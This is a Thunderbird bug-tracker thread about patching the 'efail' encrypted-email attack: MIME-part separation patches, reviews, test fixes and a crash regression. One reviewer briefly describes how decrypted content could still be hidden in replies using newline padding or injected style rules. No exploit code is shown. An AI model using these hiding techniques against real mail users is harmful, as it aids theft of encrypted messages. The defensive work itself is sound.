You can easily reproduce that by sending yourself an email with HTML attachments (or plaintext, for that matter). You will see horizontal lines. For illustration, I used empty HTML documents, and opened them in a 52.8.0 without my patches, and made a screenshot, attached here.

In the screenshot, you will see "empty.html" in the line, which makes the purpose of these lines clear. That's obviously the file name of the attachment shown, and the name is taken from the MIME headers Content-Type: name="" or Content-Disposition: filename="".

Now, when you open the attack email in a 52.8.0, you don't see these lines. But you should. That you don't see them is an effect of the attack in action and code failing to do what's intended. We never intended for an S/MIME part to be between 2 HTML parts.

When you open the attack email with my patch, you see the attachment separator lines again. That's not a bug, but actually the normal Thunderbird behavior (see above), and a sign of things working normally.
So, why is the filename missing? Remember that the attack emails are hand-crafted, so they're not playing as nice. They do not contain the file name, just "Content-Type: text/html", no name="", nothing else, and no other MIME header. So, we don't have a file name to display, and we do the only reasonable thing we can do: display a horizontal line between the different attachments. Given that the attachments are themselves empty, you end up seeing only these lines.

This test email is looking odd only because it's a specifically crafted attack email with no content, no filename, odd MIME output etc..

So, in fact, these lines are working as they should.
Comment on attachment 8976703 [details]
tb-efail-attachment-separators.png

(Obsoleting screenshot, because it's only answering Jörg's valid question, but not otherwise adding value to this bug.)
Attachment #8976703 - Attachment is obsolete: true
Attached image horizontal lines.png
Richard, could you please load the e-mail in attachment 8975458 [details] (which you encoded for me a little while ago) and apply patch "Separate MIME parts from each other, v4 (trunk and 52)". You should see what is shown in the picture. Sadly the horizontal lines have no margin/padding. Could you find our their class and add CSS to make the thing look a bit better.
Comment on attachment 8976351 [details] [diff] [review]
Sanitizer code cleanup, v2

> I don't care much about the pref,

Thanks for being pragmatic, Magnus.

Given that I AllowStyles doesn't actually work with CIDOnly, it would need the mozilla-central hunk from Sanitize composer, v4 patch, it makes sense to remove that part from the patch. That then also makes the pref name change moot, so I can revert that as well. That would make this "cleanup" a pure code cleanup with no functional changes. So, it's for trunk only anyway.

> but this (and other patches) need to apply to trunk

Yes.

I'll try to make patches for trunk, but I can't promise it, because I'm running out of work time on this here.
(In reply to Jens Müller from comment #109)
> [Hanno Böck] found a bypass for the current mitigation which may be interesting :)

I've emailed him, and he sent me the exploit. I've filed bug 1462473 and attached the email.

My fixes in this bug here fix that attack, too.
(In reply to Ben Bucksch (:BenB) from comment #117)
> Is there anything that you're missing in comment 57, which gives the big
> overview?
> And the comments when I attached the patches, e.g. comment 69, comment 73
> and comment 92 and comment 97?
Thanks, I reread that. It's still unclear why we can't kill mimeInlineTextHTMLClass. I'm not familiar with (pseudo-)"classes" in MIME, as far as I know the code, it's a mess of passing function pointers around and has little to do with OO design or a C++ class hierarchy. Mercurial can certainly resurrect old code if necessary.

> > The horizontal lines
> Honestly, I don't know where they come from, but they are not coming from my
> code.
I've asked Richard to look into some CSS for them.

> I don't have the test suite set up, and last time I tried, it cost me a
> whole day to get it running. Could you please help me out there adapting the
> tests? That would be much appreciated.
Very simple, you add |ac_add_options --enable-tests| to your .mozconfig.
You run the tests, assuming M-C as top source dir with:
./mach xpcshell-test comm/mailnews/db/gloda/test/unit/test_mime_attachments_size.js
./mach xpcshell-test comm/mailnews/db/gloda/test/unit/test_mime_emitter.js
Otherwise it's:
mozilla/mach xpcshell-test mailnews/db/gloda/test/unit/test_mime_attachments_size.js

The latter failure looks trivial:
"<html><head></head><body>I am HTML! Woo! </body></html>" ==
"<html><head>\\n<meta http-equiv=\\"content-type\\" content=\\"text/html; \\"></head><body>I am HTML! Woo! \\n\\n</body></html>"
Looks like you just need to change the test expectancy here.

(As you know, my contract is currently on hold, so I'm back to volunteer status and I exhausted the promised volunteer hours for this week already fixing bustages so we can actually run tests and land these patches when ready. I trust you understand that I won't be able to assist further.)
Please CC the usual suspects on bug 1462473.
Flags: needinfo?(jens.a.mueller)
See Also: → 1462481
Attachment #8976085 - Attachment is obsolete: false
Comment on attachment 8976085 [details] [diff] [review]
Sanitizer code cleanup

Sanitizer cleanup moved to bug 1462481
Attachment #8976085 - Attachment is obsolete: true
Attachment #8976351 - Attachment is obsolete: true
Depends on: 1462488
Comment on attachment 8976363 [details] [diff] [review]
Sanitize quotes, v4 (for 52)

I've moved the "sanitize quoted HTML" part to bug 1462488.

I still think that this should be part of the fix here, in one way or another. But a separate bug allows easier discussion.
Attachment #8976363 - Attachment is obsolete: true
Attachment #8976377 - Attachment is obsolete: true
> It's still unclear why we can't kill mimeInlineTextHTMLClass.

Because it's the base class for 2 othe classes.

> I'm not familiar with (pseudo-)"classes" in MIME, as far as I know the code,
> it's a mess of passing function pointers around and has little to do with OO design or a C++ class hierarchy.

That a common first impression when somebody who knows C++ looks at libmime. If you understand it, it's actually brilliant. jwz wrote it, who is actually one of the founders of mozilla.org and was the tech lead in the beginning. C was a requirement for him, so C++ OO was out.

So, he wrote a completely OO system in pure C (!) for libmime. It actually has all OO properties of encypsulation, inheritance and polymorphy. And, although it's using function pointers (like all OO systems in C), it's actually type safe. That's better than the OO system of GTK+ (which Mozilla also uses, I might add), which is not type safe.

So, yes, the code looks all yucky to people who work in C++, but it's actually brilliant for C code. libmime is the misunderstood step child of Thunderbird. Please don't beat on the poor guy. He's been doing great work for us for many years, with few problems.

I might add that the real bug here is not actually coming from libmime. libmime does its part correctly here. The problem is in the frontend that is unable to put each MIME part in its own <iframe> as it should. The fix is in libmime, because it's just a workaround against failures in higher layers.
Oh, and it's actually the cleanest class hierarchy anywhere in Thunderbird :-). By far. And well documented, too, in mimei.h. Great reading.
Thanks for the explanation. Strangely enough I don't know a person who finds this brilliant. Most find it yucky, and fixing bugs wasn't much fun either over the years:
https://hg.mozilla.org/comm-central/log/tip/mailnews/mime/src/mimemalt.cpp
https://hg.mozilla.org/comm-central/log/tip/mailnews/mime/src/mimemrel.cpp
https://hg.mozilla.org/comm-central/log/tip/mailnews/mime/src/mimemoz2.cpp
https://hg.mozilla.org/comm-central/log/tip/mailnews/mime/src/mimedrft.cpp
Particularly nice was bug 1016524, bug 1026989 and bug 1251783 :-(

Anyway, no one is opposing your patch, I even made it work on trunk and got you the test results we need. I'm also happy to organise some CSS.

===

I forgot to add Richard. Richard, see comment #120. You need to change the patch a little and
  #define TB_61 1
Flags: needinfo?(richard.marti)
hm, bug 1026989 "charset picked up from last attachment"... I wonder how many bugs steem from the fact that the frontend is unable to put each attachment in its own <iframe>. I bet this is not just a security feature, but also a correctness feature. CSS styles would also bleed between documents, and so on. Anyways, back to the patches...

Thanks that you helped me with the trunk adaption. I spent most of the night trying to get a trunk build and failed. It doesn't compile here. (Could be related to my system, as the tree is green.) So, sorry, I can't make trunk patches right now.

Thanks also for your help above with the tests. If indeed it's just adapting the expected result values, it should be trivial, yes.
(In reply to Ben Bucksch (:BenB) from comment #130)
> I wonder how
> many bugs steem from the fact that the frontend is unable to put each
> attachment in its own <iframe>. I bet this is not just a security feature,
> but also a correctness feature. CSS styles would also bleed between
> documents, and so on.
Yes, I agree 700%. See bug 1297653, ancient bug 31052 and friends. You approach here to at least ensure syntactical correctness of each HTML part by parsing it separately is a good step in the right direction. Even without <iframe seamless> we should implement bug 1297653, so at least HTML attachments don't bleed CSS into the body.
Ben, can you also please provide a test for the new MIME parser class. As per comment #83, the C++ interface mozilla::dom::DOMParser::CreateWithoutGlobal() was created only for TB, it is not covered by any M-C tests and can break silently any time, see bug 1454842 comment #4. It was previously only used in "Windows Live Mail" import but it is now moving onto the main code path for HTML mail. So it would be good to write an M-C gtest to guarantee its functioning so M-C bustage doesn't hit us. At the very least we should write a C-C test that loads a HTML mail with "doubtful" content and then checks that the body is properly "corrected". We have many Xpcshell and Mozmill tests that load messages from file, process them and then check their body/content. So it wouldn't be hard to copy something together. The last one I did was in bug 1456001.
Attached image DOM.png
(In reply to Jorg K (GMT+2) (bustage-fix only, NI for urgent reviews) from comment #120)
> Created attachment 8976711 [details]
> horizontal lines.png
> 
> Richard, could you please load the e-mail in attachment 8975458 [details]
> (which you encoded for me a little while ago) and apply patch "Separate MIME
> parts from each other, v4 (trunk and 52)". You should see what is shown in
> the picture. Sadly the horizontal lines have no margin/padding. Could you
> find our their class and add CSS to make the thing look a bit better.

The problem isn't the missing padding, it's applied. When you view the body as plain text the padding is correct. The problem is on HTML and Simple HTML: The message text isn't placed inside the moz-text-html class like in moz-text-plain. You can see the position of the closing </div> I marked with the red arrows.

Because of this, the moz-text-html class has a height of 0px and the following class is placed directly after the text.

When the text would be inside the class, all should be correct again.
Flags: needinfo?(richard.marti)
Can't test trunk, because it fails to compile for me. Filed bug 1462794.
Depends on: 1462794
> Ben, can you also please provide a test for the new MIME parser class.

Sorry, I have run of time for this bug. I spent most of the week on it (27 hours). Given that I'm not paid for it, I have to stop here.

> [the Gecko API we use] can break silently any time, see bug 1454842 comment #4.

I see your point. A test would be useful. But if the parser API indeed goes away, we'd fail to build. If it was building, but not working properly, lots of existing tests would fail, because this is now the default handler for HTML mails. So, I would say we have sufficient coverage. But... if you want to add a specific test later on, that's fine. I don't think the time is now, though.

In any case, I myself cannot spend any more time on this. I'll be available for help, if you need my expertise. If you want to polish this patch further, please go ahead. I'd only request that you attribute the commit to me.

The patch works, with 52 and trunk. 3 days ago, I've spent an entire night on this, to get out as quickly as possible. Please land it and get it out now.

People are waiting for the fix, eyes are on us. Every day we delay the fix causes PR damage. Please speak to Ryan, he spent the whole last day putting fires out.
For the unit tests, I would recommend:
* For existing tests, simply change the expected outcome to the current outcome.
* For a specific test case for this bug, I would
  * take the emls attached here, and
  * use some existing test code that compares a test email with the libmime output. Then,
  * check that the actual output is the current output.
  * If you want to reduce spurious test failures, you could use an email with only the cut-off HTML part.
    The expected output would contain the closing tags.

That should be reasonably quick to develop for somebody. But with all the build problems I had, on trunk and 60, and the review, I ran out of time. Sorry.
To inform beyond those who I have PNed and are on drivers list, early this week we decided release 52.8.0 with the patches in hand to get them in the hands of users, and not wait on this last bug.  That release is immenent. The other efail patches will be mentioned in the CVE linked from the release notes.
Ben, I guess we can organise for someone else to write the tests, but with your MIME knowledge, please look at Richard's comment #133. Something isn't right with the HTML the new MIME class produces.

Thanks Richard, for the analysis. BTW, could you decode the message part?
Ben, I looked at the DOM for "simple HTML". Sadly, that shows the same problem. The text content is not inside the <div>, thus proper CSS isn't applied. Richard, can you please confirm.

So "simple HTML" appears to have a bug which is now exposed on the code path for "original HTML". I'm sure you agree we can't accept the patch in it's current form. Could you please take a look how to fix this issue.
Flags: needinfo?(richard.marti)
(In reply to Jorg K (GMT+2) (bustage-fix only, NI for urgent reviews) from comment #139)
> Ben, I looked at the DOM for "simple HTML". Sadly, that shows the same
> problem. The text content is not inside the <div>, thus proper CSS isn't
> applied. Richard, can you please confirm.

Yes, I wrote in comment 133: "The problem is on HTML and Simple HTML". Both use the same class and the text is not inside the <div>.

BTW, what do you mean with: could you decode the message part?
Flags: needinfo?(richard.marti)
(In reply to Richard Marti (:Paenglab) from comment #140)
> Yes, I wrote in comment 133: "The problem is on HTML and Simple HTML". Both
> use the same class and the text is not inside the <div>.
Oops, missed that at 1:09 AM :-(

> BTW, what do you mean with: could you decode the message part?
Sorry, "decrypt". Did you see what you can see in attachment 8976711 [details]: "Hallo Jörg, ...".
No, only the "Please answer to..." and two lines.
Depends on: 1462895
Richard wrote:
> The message text isn't placed inside the moz-text-html class

Ah, I see. Yes, that should be trivial to fix.

That code is already in the Normal HTML class. So, we need to either make sure to call the super function properly, I guess we simply don't do that, or we need to add corresponding code to the specialized classes.
Please fix it in bug 1462895, then use that fix on your new parser class. I promise a very quick review in bug 1462895 and immediate landing if there are no test failures. The same goes for bug 1462481. I trust I fixed your build problem also :-) (and all for free).
Since the little brother mimethsa.cpp just got a clean-up, I've done the same here (so we can stop the discussion and focus on the (severe) issue at hand). I've also removed the conditional compile code, since we won't land that on trunk. That will have to be restored for TB 60 and TB 52 but we cross that bridge when we get to it.

The test failures and the "text outside div" (bug 1462895) are blocking this.
Attachment #8976349 - Attachment is obsolete: true
Attachment #8976349 - Flags: review?(mkmelin+mozilla)
Attachment #8979059 - Flags: review?(mkmelin+mozilla)
Comment on attachment 8979059 [details] [diff] [review]
Separate MIME parts from each other, v4 (trunk only, with clean-up)

r+ conditional on fixing bug 1462895.
Attachment #8979059 - Flags: review+
Attached patch 1419417-fix-tests.patch (obsolete) — Splinter Review
This fixes the tests.

Let's be sure and do another try:
https://treeherder.mozilla.org/#/jobs?repo=try-comm-central&revision=5f2ef8a7ecf069d845d368ecf2f068ceb8fadd53
Attachment #8979060 - Flags: review?(mkmelin+mozilla)
Attached patch 1419417-fix-tests.patch (v2) (obsolete) — Splinter Review
Different platforms have different line endings, so this only worked on Windows. The new version should work everywhere.

https://treeherder.mozilla.org/#/jobs?repo=try-comm-central&revision=1ce20ed3e47d9df8c5fbe68033bc628951b7b9f7
Attachment #8979060 - Attachment is obsolete: true
Attachment #8979060 - Flags: review?(mkmelin+mozilla)
Attachment #8979061 - Flags: review?(mkmelin+mozilla)
Attachment #8979062 - Flags: review?(mkmelin+mozilla)
Comment on attachment 8979059 [details] [diff] [review]
Separate MIME parts from each other, v4 (trunk only, with clean-up)

Review of attachment 8979059 [details] [diff] [review]:
-----------------------------------------------------------------

r=mkmelin with the below adressed.

Sadly, this is a required step to prevent efail, but this is not fixing it for reply/fwd. 
I thought earlier just converting to plain text would fix that, and it would mitigate for sure. But thinking about that some more, you could put enough newlines to push the content out of view then. 
When using html, even with this patch, styles leak over between parts and can hide the content of the encrypted part so you would't see it when composing (either).

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +71,5 @@
> +    PR_Free(content_type);
> +    if (charset)
> +    {
> +      nsAutoCString charsetline(
> +        "\n<meta http-equiv=\"Context-Type\" content=\"text/html; charset=");

I believe this is wrong (and at this point no content type should be output). Haven't checked if it's just ignored or would cause problems.
The second one of the  <meta http-equiv="Context-Type" content="text/html; charset=utf-8">,  didn't use to appear. We just had two earlier :-p

When replying at least to an encrypted msg, I get this - notice, there's three http-equivs

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  </head>
  <body text="#000000" bgcolor="#FFFFFF">
    xyz<br>
    <br>
    <div class="moz-cite-prefix">On 4/19/18 11:27 PM, Magnus Melin
      wrote:<br>
    </div>
    <blockquote type="cite"
      cite="mid:79777860-fbab-4c85-9885-42936cadc71c@netti.fi">
      <meta http-equiv="Context-Type" content="text/html; charset=utf-8">
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      Heyheyhey!<br>
      <br>

@@ +100,5 @@
> +
> +  // We have to cache all lines and parse the whole document at once.
> +  // There's a useful sounding function parseFromStream(), but it only allows XML
> +  // mimetypes, not HTML. Methinks that's because the HTML soup parser
> +  // needs the entire doc to make sense of the glibberish that people write.

gibberish
Attachment #8979059 - Flags: review?(mkmelin+mozilla) → review+
Attachment #8979062 - Flags: review?(mkmelin+mozilla) → review+
Comment on attachment 8979061 [details] [diff] [review]
1419417-fix-tests.patch (v2)

Review of attachment 8979061 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +71,5 @@
>      PR_Free(content_type);
>      if (charset)
>      {
>        nsAutoCString charsetline(
> +        "\n<meta http-equiv=\"content-type\" content=\"text/html; charset=");

dunno what this change is about. But the whole outputting of http-equiv here looks wrong to me, pre previous comments
Magnus, the current code is erroneously using "Context-Type", see:
https://dxr.mozilla.org/comm-central/rev/9c9d0d5d6c8292e20b06cc895ed3b97eb55afe4f/mailnews/mime/src/mimethsa.cpp#82

The new code, which is an adaption of mimethsa.cpp copied this error, also had it. I noticed when making the test work, so I corrected it.

Let me reshuffle the patches. Until the test patch has r+, I cannot land this. Also, bug 1462895 is blocking the fix here since we would be using incorrect DOM for all HTML views, not just simple.
Is this what you meant? I've fixed the "Context".
Attachment #8979059 - Attachment is obsolete: true
Attachment #8979120 - Flags: review?(mkmelin+mozilla)
Same test fixed, but "repair" hunks moved elsewhere.
Attachment #8979061 - Attachment is obsolete: true
Attachment #8979061 - Flags: review?(mkmelin+mozilla)
Attachment #8979122 - Flags: review?(mkmelin+mozilla)
Here you go.
Attachment #8979123 - Flags: review?(mkmelin+mozilla)
Comment on attachment 8979123 [details] [diff] [review]
1419417-fix-mimethsa.patch [landed in bug 1462481 comment #11]

To advance proceedings, I've landed this as part of bug 1462481:
https://hg.mozilla.org/comm-central/rev/1dd08f49b8dd52533738f6471621097c3638e5ab
Attachment #8979123 - Flags: review?(mkmelin+mozilla) → review+
Attachment #8979123 - Attachment description: 1419417-fix-mimethsa.patch → 1419417-fix-mimethsa.patch [landed in bug 1462481 comment #11]
> this is not fixing it for reply/fwd.

Magnus, could you please elaborate?

Compare comment 63.
Flags: needinfo?(mkmelin+mozilla)
Attachment #8979120 - Flags: review-
Attachment #8976349 - Attachment is obsolete: false
Depends on: 1463047
Ben:
Attachment #8979120 [details] [diff] - Flags: review-

It's your own code cleaned up, so why the r-? By mistake?
All I changed was
- fixed "Context"
- white-space issues
- removed conditional code.
Attachment #8976349 - Attachment description: Separate MIME parts from each other, v4 (trunk and 52) → Separate MIME parts from each other, v4 (trunk and 52) - not for landing, but contains code for TB 52 and 60.
Attachment #8976349 - Flags: review-
Comment on attachment 8979120 [details] [diff] [review]
Separate MIME parts from each other, v4b (trunk only, with clean-up)

I think that was by mistake or perhaps due to the white-space changes Ben didn't like. For the record, currently 378 functions don't have a space before the parenthesis, 313 do. So the prevailing style is what this patch does. r- will only confuse Magnus, since the predecessor already had r+ and I fixed the Context issue here, and I'm just checking this is what Magnus meant.
Attachment #8979120 - Flags: review-
I found the <div> problem.

The superclass parse_line() function was called correctly. However, in eol(), we called the superclass eof() function - which is what outputs the closing </div> tag - at the *beginning* of the child function for HTMLParsed and HTMLSanitized. These classes need to buffer up everything in memory and - due to lacking streaming APIs in Gecko - parse it all at once in eof(), not in parse_line(). These 2 facts in combination meant that the </div> was output before the actual HTML content. Once I realized that, it was trivial: Move the superclass function call of eof() to the end of the eof() child function, and it works.
Attachment #8979120 - Attachment is obsolete: true
Attachment #8979120 - Flags: review?(mkmelin+mozilla)
Attachment #8979187 - Attachment is obsolete: true
Attachment #8979183 - Attachment is obsolete: true
Comment on attachment 8979122 [details] [diff] [review]
1419417-fix-tests.patch (v2)

If these changes appear reasonable, please r+ so we can move forward without waiting for Magnus' next time slot. I'll adjust it to Content-Type later.
Attachment #8979122 - Flags: review?(ben.bucksch)
Comment on attachment 8979190 [details] [diff] [review]
Separate MIME parts from each other, v5.1 (for trunk)

Review of attachment 8979190 [details] [diff] [review]:
-----------------------------------------------------------------

Please align the code with mimethsa.cpp. Sadly, I had already done so, but the changes got lost.

I'll put it all together and start a try after lunch.

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +59,5 @@
> +  int status = ((MimeObjectClass*)&MIME_SUPERCLASS)->parse_begin(obj);
> +  if (status < 0)
> +    return status;
> +
> +  // charset

Remove that line.

@@ +60,5 @@
> +  if (status < 0)
> +    return status;
> +
> +  // charset
> +  // dump the charset we get from the mime headers into a HTML <meta http-equiv>

Sentence/upper case with full stop.

@@ +107,5 @@
> +  nsString& rawHTML = *(me->complete_buffer);
> +  nsString parsed;
> +  nsresult rv;
> +
> +  // Parse the HTML source

Full stop.

@@ +116,5 @@
> +    rawHTML, mozilla::dom::SupportedType::Text_html, rv2);
> +  if (rv2.Failed())
> +    return -1;
> +
> +  // Serialize it back to HTML source again

and here.

@@ +125,5 @@
> +  NS_ENSURE_SUCCESS(rv, -1);
> +  rv = encoder->EncodeToString(parsed);
> +  NS_ENSURE_SUCCESS(rv, -1);
> +
> +  // Write it out

and here.
Comment on attachment 8979123 [details] [diff] [review]
1419417-fix-mimethsa.patch [landed in bug 1462481 comment #11]

Review of attachment 8979123 [details] [diff] [review]:
-----------------------------------------------------------------

I meant to remove the outputting of meta http-equiv here since it looked wrong.
I think it's proof enough if it has been there and with a typo all these years making it a no-op, that my hunch was correct ;)
Comment on attachment 8979122 [details] [diff] [review]
1419417-fix-tests.patch (v2)

Review of attachment 8979122 [details] [diff] [review]:
-----------------------------------------------------------------

If this is needed for the tests too be happy, looks reasonable. 

Please though Upper-Case the content-type to Content-Type. Lowercase looks so ugly.
Attachment #8979122 - Flags: review?(mkmelin+mozilla) → review+
Comment on attachment 8979122 [details] [diff] [review]
1419417-fix-tests.patch (v2)

+    // Account for stuff added by libmime, incl. two CRLF or LF before and after.
+    totalSize += "<meta http-equiv=\"content-type\" content=\"text\/html; \">".length;
+    totalSize += ("@mozilla.org/windows-registry-key;1" in Cc) ? 4 : 2;

I don't think it's good idea to hardcode the number of linebreaks and that "windows-registry-key" test is a hard-to-read and failure-prone way to say "this is Windows".

I would recommend to do what you did in the second test: before calculating the string size, simply remove the <meta> tag (if it exists) - which would still work and not break the test, if we would go back to the old way, which I anticipate - and you can do the same with the LFCR, by simply removing all LF before getting the size.

However, I don't want to be a pain like some other reviewers :-), and I don't care about these tests, so giving you an r+ anyway. I think what I said should be fixed, but it doesn't have to be right now. It's most important to get the fix out.
Attachment #8979122 - Flags: review?(ben.bucksch)
Attachment #8979122 - Flags: review+
Sorry, I walked over Magnus's r+. You can keep both.
But I second what Magnus said, too.
(In reply to Ben Bucksch (:BenB) from comment #158)
> > this is not fixing it for reply/fwd.
> 
> Magnus, could you please elaborate?

It's not fixing for composition because the decrypted content is still there in the reply, even now when the parts are parsed separately. It is mitigated quite a bit because you can't(?) that easily hide the decrypted content completely. You can however end the first html part with 100 newlines, or, put <style>*something matching everything but your content { display:none } </style> inside the first part.
That will blead into the second part to hide the content, and when you reply you will not see it. 

If the content is decrypted, we need it marked some way to remove it. I'm not really sure how, because the legitimate use case of replying and quoting an encrypted message should still work of course.

> Compare comment 63.

I'm not sure what you're referring to. Prior to 52, composition was doing window->GetDocShell()->SetAppType(nsIDocShell::APP_TYPE_EDITOR); This was a major problem that I fixed in bug 1151366.
Flags: needinfo?(mkmelin+mozilla)
(In reply to Magnus Melin from comment #168)
> I meant to remove the outputting of meta http-equiv here since it looked
> wrong.
> I think it's proof enough if it has been there and with a typo all these
> years making it a no-op, that my hunch was correct ;)
Well, the charset= part wasn't a no-op, was it? Ben? I'd prefer to leave it in for now.

(In reply to Ben Bucksch (:BenB) from comment #170)
> I don't think it's good idea to hardcode the number of linebreaks and that
> "windows-registry-key" test is a hard-to-read and failure-prone way to say
> "this is Windows".
That's pre-existing code, copied again:
https://dxr.mozilla.org/comm-central/search?q=%40mozilla.org%2Fwindows-registry-key%3B1&redirect=false
(In reply to Jorg K (GMT+2) (bustage-fix only, NI for urgent reviews) from comment #173)
> Well, the charset= part wasn't a no-op, was it? Ben? I'd prefer to leave it
> in for now.

Huh? If it said Context-Type instead of Content-Type it will have been completely ignored.
No, you had:
<meta http-equiv="Context-Type" content="text/html; charset=..."

So perhaps the first part was ignored, not the second. Anyway, I'm leaving it in for now, please file a follow-up. We're running out of time with nit discussions.

I'm going to put it all together right now and start a try.
The charset= is inside the content quote, so it would not make any difference. There's no second part. But sure, do a followup.
Comment on attachment 8979190 [details] [diff] [review]
Separate MIME parts from each other, v5.1 (for trunk)

Review of attachment 8979190 [details] [diff] [review]:
-----------------------------------------------------------------

The DOM created still has the body outside the <div>. Please use the Inspector inside Dev Tools to see it. So the corresponding code change had no effect. Tested with attachment 8975458 [details]. I won't mark it r-, but please address this issue.

Also, I re-enabled r? for jorgk again.

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +61,5 @@
> +    return status;
> +
> +  // charset
> +  // dump the charset we get from the mime headers into a HTML <meta http-equiv>
> +  char *content_type = (obj->headers

As I said a few times before, please remove the superfluous parenthesis.

@@ +63,5 @@
> +  // charset
> +  // dump the charset we get from the mime headers into a HTML <meta http-equiv>
> +  char *content_type = (obj->headers
> +     ? MimeHeaders_get(obj->headers, HEADER_CONTENT_TYPE, false, false)
> +     : 0);

and here.
I came to adjust the test to Content-Type and noticed the following:

Some part of the system still inserts content-type, so in order to get the test to pass, I need to:
replace(/[\n]*<meta http-equiv="Content-Type" content="text\/html; .*">[\n]*/ig, "")

Note the /ig, so ignoring case. Maybe that comes from here:
https://searchfox.org/mozilla-central/rev/8affe6e83188787eb61fe0528eeb6eef6081ba06/dom/base/nsXHTMLContentSerializer.cpp#378

However, after taking that first hurdle, the program crashes when running test_mime_emitter.js:
nss3.dll!PR_Assert(const char * s, const char * file, int ln) Line 553	C
xul.dll!MimeInlineText_parse_end(MimeObject * obj, bool abort_p) Line 249	C++
xul.dll!MimeInlineText_finalize(MimeObject * obj) Line 179	C++
xul.dll!mime_free(MimeObject * object) Line 278	C++
xul.dll!MimeMultipartRelated_finalize(MimeObject * obj) Line 244	C++
xul.dll!mime_free(MimeObject * object) Line 278	C++
xul.dll!MimeContainer_finalize(MimeObject * object) Line 77	C++
xul.dll!mime_free(MimeObject * object) Line 278	C++
xul.dll!mime_display_stream_complete(_nsMIMESession * stream) Line 955	C++
xul.dll!nsStreamConverter::OnStopRequest(nsIRequest * request, nsISupports * ctxt, nsresult status) Line 1050	C++
xul.dll!nsMsgProtocol::OnStopRequest(nsIRequest * request, nsISupports * ctxt, nsresult aStatus) Line 389	C++

test_mime_attachments_size.js equally crashes.

So maybe the obvious change of moving the eol() calls around wasn't so obvious.

Ben, if you want to debug it:
mach xpcshell-test --interactive ...
then you can attach the debugger before running the test.
Attached patch 1419417-fix-tests.patch (v3) (obsolete) — Splinter Review
Adjusted for Content-Type. Both tests crash with the latest C++ patch.
Looking at the CSS for moz-text-html I didn't find any. So perhaps we return to the previous version of the patch that didn't cause crashes and fix the <div> issue in bug 1462895 later for both sanitised and parsed/standard HTML? Otherwise we'll be here for a while longer :-(
That said, the DOM for sanitised HTML being wrong points to some internal problem, so moving this problem onto the main code path for all HTML without understanding it appears a little risky, especially in a dot release 52.8.1.
(In reply to Magnus Melin from comment #176)
> The charset= is inside the content quote, so it would not make any
> difference. There's no second part. But sure, do a followup.
Well, I tried the sanitised HTML view which uses similar code and removed writing of the meta tag. I tried in UTF-8 and windows-1252 and the display was still OK. I don't now how Gecko managed that.
The code also generates:
<div class="moz-text-html" lang="x-western"></div> or
<div class="moz-text-html" lang="x-unicode"></div>
which is completely wrong since the lang attribute should have a language tag, like "en-US" or "de-AT" or so. So this area also needs a clean-up sadly.

Filed bug 1463133.
> It's not fixing for composition because the decrypted content is still there in the reply, even now when the parts are parsed separately.

Hey Magnus, ah, yes, but that's a completely separate issue, and different fix.
The user can still detect it with the scrollbar etc.
This would be fixed by solution 3 in comment 57. That's another bug.

> The DOM created still has the body outside the <div>

I've looked at the raw libmime output and the Dev Tools, and the <div> is around the HTML email. I'll attach a screenshot.

I've used a real HTML mail as test. Pay attention when using the attack emails here for testing, because they have empty HTML documents, so they can be easily confusing when used for verification.
Also, make sure that you have Original HTML on, not Sanitized HTML. I've been tripped by that once during my dev, too.

> perhaps we return to the previous version of the patch that didn't cause crashes and fix the <div>
> issue in bug 1462895 later for both sanitised and parsed/standard HTML? Otherwise we'll be here for a while longer :-(

Yes, given that the main concrete effect of the <div> is the missing margin of the separator, I think that's tolerable. We can still fix it in a later 52.9.0 or 60 release, if need be.

I'm for shipping the fix as I had it last Wednesday, that worked and fixed the security bug.
> lang="x-unicode" ... is completely wrong ... should have a language tag, like "en-US"... So this area also needs a
> clean-up sadly.

Please be careful. If you look at Firefox Preferences Font dialog, you see that it mixes languagues with "Unicode". If you look in browser/components/preferences/fonts.xul, it actually uses "x-unicode" for what's now called "Other languages" in the UI, and "x-western" also exists and is called "Latin" in the Firefox Font UI. So that code is actually perfectly correct for Gecko. And that's the point here, to pick the right font family for display. So, please don't be presumptuous in judging and esp. modifying that code. Like a grandfather, libmime is old code, and it's not perfect, but it does work. Be careful before dismissing it, you might really break stuff.
> I tried the sanitised HTML view which

...could explain why you still see the <div> in the wrong place, because you applied the patch here and not the Sanitizer one which you asked me to separate out to bug 1462895, and if you enabled Sanitized HTML, that means that you wouldn't even use the HTML Parsed class, and would not see the effects of the fix here.

Also, again, please try with real HTML emails, not just the attack emails here.
(In reply to Ben Bucksch (:BenB) from comment #184)
Sorry Ben, you're confused here. I'm quite aware of encodings and writing systems and how Gecko tries to derive one from the other. Further reading in bug 1228193 comment #10.

Unicode (UTF-8) and Western (windows-1252) in the |View > Text Encoding| menu are encodings. "x-unicode" (Other Languages) and "x-western" (Latin) are writing systems. Language is something different, but language maps to writing system.
https://dxr.mozilla.org/mozilla-central/source/intl/locale/langGroups.properties

Stuffing a writing system into the lang attribute seems 100% wrong, but let's discuss this in bug 1463133.
(In reply to Ben Bucksch (:BenB) from comment #185)
> Also, again, please try with real HTML emails, not just the attack emails
> here.
Ben, with the latest patch, viewing HTML messages just crashes, also seen in the test crashes.

The message from attachment 8979247 [details] only shows horizontal lines. So sorry, your patch doesn't work at all.
Ben, viewing this message crashes. Please try a few "normal" HTML messages. This one is multi-part related. It crashes in original HTML and sanitised. I have the C++ patch here and the one from bug 1462895 applied.

As mentioned, the Xpcshell tests also crash. Frankly, I'm tired, I've tried stuff all day. libmime isn't as brilliant as you said, you poke it, and it breaks :-(
Comment on attachment 8979190 [details] [diff] [review]
Separate MIME parts from each other, v5.1 (for trunk)

This causes crashes and obliterates previously working display of HTML messages.

Please re-submit when working. Ideally, as the assignee, do a try push and also run the tests manually.
Attachment #8979190 - Flags: review-
> Please re-submit when working.

I'm done here. I've been working on this since almost a week, more than full time, and most of that on the review and building various branches. I'm seriously neglecting my job.

> Ben, with the latest patch, viewing HTML messages just crashes, also seen in the test crashes.

Like I said, trunk without any changes crashes for me on startup, so I can't do anything for trunk.

52.8.1 is what we need to get out right now. The 52 patch works for me for TB 52. Including the test message you attached, and all messages from my inbox that I tried, and the attack emails. 52 hasn't ever crashed for me. Did you test on 52? Does it work?

